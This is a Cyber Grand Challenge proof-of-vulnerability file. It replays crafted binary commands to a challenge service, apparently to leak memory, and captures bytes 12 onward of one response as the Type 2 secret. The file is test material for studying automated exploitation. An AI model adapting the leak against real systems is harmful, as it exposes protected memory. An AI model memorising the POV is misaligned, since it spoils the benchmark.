<?xml version="1.0" standalone="no" ?>
<!DOCTYPE cfepov SYSTEM "/usr/share/cgc-docs/cfe-pov.dtd">
<cfepov>
<cbid>service</cbid>
<replay>
    <negotiate>
        <type2 />
    </negotiate>

    <write><data>i\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00a</data></write>
    <read><length>4</length><match><data>\x00\x00\x00\x00</data></match></read>
    <write><data>m\x25\x42\x2f\xb1\x25\x42\x2f\xb1\x04\x00\x00\x00\x00\x00\x00\x00</data></write>
    <read><length>4</length><match><data>\x00\x00\x00\x00</data></match></read>
    <write><data>=\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00</data></write>
    <read><length>16</length><assign><var>TYPE2_VALUE</var><slice begin="12" /></assign></read>
    <write><data>q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</data></write>
    <delay>100</delay>
</replay>
</cfepov>
